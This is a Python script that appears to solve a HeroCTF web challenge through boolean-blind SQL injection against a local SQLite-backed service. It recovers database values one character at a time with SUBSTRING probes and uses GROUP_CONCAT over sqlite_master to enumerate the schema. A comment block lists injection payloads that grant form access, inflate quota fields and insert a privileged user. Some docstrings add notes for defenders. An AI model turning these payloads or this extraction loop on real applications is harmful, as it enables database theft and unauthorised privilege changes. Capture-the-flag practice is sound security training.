HerVIP1.py
#!/usr/bin/env python3
import requests
import string
import time
import sys
import random
import string
'''
table :
- users :
- CREATE TABLE users(alias varchar(100) primary key, password varchar(1000), canAccessForm int DEFAULT 0)
- queue :
- CREATE TABLE queue(uuid varchar(200) primary key, origin varchar(1000), associateUser varchar(100), lastUpdate DATE, p3rc3nt4g30fus3r varchar(1000), numberOfRequest varchar(1000))
'; UPDATE users SET canAccessForm = 1 WHERE alias = "aa"--
'; UPDATE queue SET p3rc3nt4g30fus3r="100", numberOfRequest="100"--
'; INSERT INTO users (alias, password, canAccessForm) VALUES ("bb", "lhtt0+3jy47LqsvWjeBAzXjrLtWIkTDM60xJJo6k1QY=", 1)--
'; INSERT INTO queue (uuid, origin, associateUser, lastUpdate, p3rc3nt4g30fus3r, numberOfRequest) VALUES ("2f1395a1-b89b-4d48-93a8-a4e18ac48471", "chall.heroctf.fr", "aa", DATETIME('now'), "1000", "1000")--
3f1395a1-b89b-4d48-93a8-a4e18ac48471 chall.heroctf.fr aa Sun May 29 2022 09:20:24 GMT+0000 (Coordinated Universal Time) 01 0##
aa lhtt0+3jy47LqsvWjeBAzXjrLtWIkTDM60xJJo6k1QY= 0
update/1', p3rc3nt4g30fus3r='1000'--
'''
# Candidate alphabet for the per-position search in main(). Note that
# string.printable already contains ' ' (via string.whitespace), so the
# leading ' ' here makes the space character be probed twice per position.
charset = ' '+string.printable
# Target endpoint (a local instance). trychar() appends its probe text
# directly after "id=update/"; presumably the server concatenates that
# value into its SQL, which is the condition this script depends on.
url = "http://localhost:8081/?id=update/"
def trychar(char, offset):
    """Boolean-blind probe: test whether the character at 1-based position
    ``offset`` of the queried value equals ``char``.

    Two HTTP GETs are issued per call: the first sends the SUBSTRING
    comparison inside the ``id`` parameter of ``url``; the second fetches
    ``{url}111`` and inspects its body. Neither request sets a timeout, so a
    stalled server blocks the caller indefinitely.

    Args:
        char: single character to compare against.
        offset: 1-based position passed to SUBSTRING.

    Returns:
        0 if the body of the second request contains
        ``'"numberOfRequest":"0"'``, otherwise 1 (treated by main() as a match).

    Defender notes: the whole technique relies on the server building its
    query by string concatenation — a parameterized query for the ``id``
    lookup removes the oracle. Each probe is a GET whose query string carries
    ``SUBSTRING(`` / ``GROUP_CONCAT(`` / ``sqlite_master``, and main() sends
    up to ``len(charset)`` of them per recovered character, which is an easy
    signature for request logging, a WAF rule or rate limiting.
    """
    #requests.get(f"{url}foo' or SUBSTR((SELECT 'ceciestunflagimaginaire'),{offset},1)='{char}'---") # POC
    #requests.get(f"{url}foo' or SUBSTRING((SELECT GROUP_CONCAT(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),{offset},1)='{char}'--")# tables
    #requests.get(f"{url}foo' or SUBSTRING((SELECT GROUP_CONCAT(sql) FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='queue'),{offset},1)='{char}'--")# columns
    #requests.get(f"{url}foo' or SUBSTRING((SELECT alias ||' '|| canAccessForm ||' '|| password FROM users limit 1 offset 1),{offset},1)='{char}'--")
    # Probe request: the response of this call is ignored; only its effect on
    # the state read back below matters.
    requests.get(f"{url}aaa' or SUBSTRING((SELECT associateUser ||' '|| p3rc3nt4g30fus3r ||' '|| numberOfRequest ||' '|| lastUpdate FROM queue limit 1 offset 0),{offset},1)='{char}'--")
    # Oracle read-back: the presence of numberOfRequest == "0" in this body is
    # taken to mean the comparison above was false.
    r = requests.get(f"{url}111").text
    if '"numberOfRequest":"0"' in r:
        return 0
    return 1
def main():
    """Recover the queried value one character at a time.

    Starting at position 1, every character of ``charset`` is tried through
    ``trychar``; the first one that returns 1 is appended to ``password``,
    the partial value is printed, and the next position is tried. The loop
    stops at the first position where no character of ``charset`` matches,
    then prints a blank line.

    ``password`` is just the accumulated result — which column(s) it holds is
    decided by the query inside ``trychar``, not here. Cost per recovered
    character is up to ``len(charset)`` calls to ``trychar`` (two GETs each),
    which is the traffic volume a log review or rate limiter would observe.
    """
    offset = 1
    password = ""
    while True:
        found = False
        for c in charset:
            if trychar(c, offset)==1:
                password += c
                print(password)  # progress: the value recovered so far
                offset += 1
                found = True
                break
        # No candidate matched at this position: treated as end of value.
        if found == False:
            break
    print()
# Script entry point; nothing runs on import.
if __name__ == '__main__':
    main()